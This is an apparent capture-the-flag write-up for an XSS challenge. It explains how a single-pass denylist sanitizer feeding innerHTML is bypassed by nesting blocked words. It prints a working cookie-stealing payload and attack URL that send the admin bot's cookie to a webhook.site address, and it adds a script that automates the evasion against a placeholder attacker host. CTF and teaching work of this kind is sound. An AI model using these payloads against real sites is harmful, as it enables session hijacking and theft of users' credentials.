Tags: web xss 

The writeup starts at 3:40 in the video. The source code was provided for this challenge:
```
import { default as Arg } from "https://cdn.jsdelivr.net/npm/@vunamhung/[email protected]/+esm";

// Denylist filter: a single String.replace pass removes each match once and
// never re-scans the text it leaves behind.
function sanitize(content) {
  return content.replace(/script|on|iframe|object|embed|cookie/gi, "");
}

let title = document.getElementById("title");
let content = document.getElementById("content");

function display() {
  // Arg() reads a query-string parameter. title goes through textContent, which is safe.
  title.textContent = Arg("title");
  document.title = Arg("title");

  // content is written with innerHTML after the weak filter: this is the XSS sink.
  let sanitized = sanitize(Arg("content"));
  content.innerHTML = sanitized;

  document.body.style.backgroundColor = Arg("background_color");
  document.body.style.color = Arg("color");
  document.body.style.fontFamily = Arg("font");
  content.style.fontSize = Arg("font_size") + "px";
}

display();
```
The sanitization on the `content` parameter can be bypassed because `replace` runs a single pass: each match of the denylist is removed once and the remainder is never re-scanned, so `oonn` => `on` (the inner `on` is stripped, the outer `o` and `n` close up around the gap). The same trick works for every word on the list, e.g. `ccookieookie` => `cookie` and `locatioonn` => `location`. Following this logic we can use the following content payload (decoded from the URL below):
```
<img src=x oonnerror='document.locatioonn="https://webhook.site/f202667e-9179-425d-80c1-fd62da5915d4?"+document.ccookieookie'>
```
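As an added example (not code from the challenge or the original writeup), the block below reproduces the challenge's single-pass denylist, generalizes the `oonn` => `on` trick to every word on the list, and contrasts it with a fixpoint variant of the same filter. The payload and the `attacker.example` exfiltration host are constructed placeholders.

```javascript
// Added example: single-pass denylist bypass by nesting, and why "loop until
// stable" only closes this one hole. Not code from the challenge.

const BLOCKLIST = /script|on|iframe|object|embed|cookie/gi;

// Same behaviour as the challenge's sanitize(): one pass, each match removed once.
function sanitizeOnce(content) {
  return content.replace(BLOCKLIST, "");
}

// Repeat the removal until the string stops changing. This defeats nesting,
// but it is still a denylist: any handler or tag not on the list passes.
// The real fix is to keep attacker input out of innerHTML (use textContent)
// or to run an allowlist HTML sanitizer.
function sanitizeToFixpoint(content) {
  let prev;
  let cur = content;
  do {
    prev = cur;
    cur = prev.replace(BLOCKLIST, "");
  } while (cur !== prev);
  return cur;
}

// Wrap one blocked word inside itself: "on" -> "oonn", "cookie" -> "ccookieookie".
// Removing the inner copy once leaves the outer copy intact. This holds as long
// as the nested form does not create an earlier match of another listed word,
// which is true for this list.
function nest(word) {
  return word[0] + word + word.slice(1);
}

// Apply nest() to every blocked word in a payload so it survives sanitizeOnce().
function evade(payload) {
  return payload.replace(BLOCKLIST, (m) => nest(m));
}

// Constructed payload with the same shape as the writeup's (placeholder exfil host).
const PAYLOAD =
  "<img src=x onerror='document.location=\"https://attacker.example/?\"+document.cookie'>";

function demo() {
  const evaded = evade(PAYLOAD);
  return {
    evaded,
    afterOnePass: sanitizeOnce(evaded),        // equals PAYLOAD: the filter undid the nesting
    afterFixpoint: sanitizeToFixpoint(evaded), // handler name and "cookie" are gone
  };
}

console.log(demo());
```

`evade(PAYLOAD)` yields exactly the `oonnerror` / `locatioonn` / `ccookieookie` form used in the writeup, and one pass of the challenge filter turns it back into the working payload.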
If we submit the above content payload through the page, it is URL-encoded into the `content` parameter and we get the following URL:
```
http://fancy-page.hsctf.com/display.html?title=a&content=%3Cimg%20src%3Dx%20oonnerror%3D%27document.locatioonn%3D%22https%3A%2F%2Fwebhook.site%2Ff202667e-9179-425d-80c1-fd62da5915d4%3F%22%2Bdocument.ccookieookie%27%3E&background_color=%23ffffff&color=%23000000&font=Helvetica&font_size=16
```
If we submit this URL to the admin bot, `src=x` fails to load, the `onerror` handler runs in the bot's browser and sends its cookie to webhook.site, where the flag (stored in the admin bot's cookie) shows up:
```
flag{filter_fail}
```

Original writeup (https://youtu.be/QKZWyWQSPaw?t=220).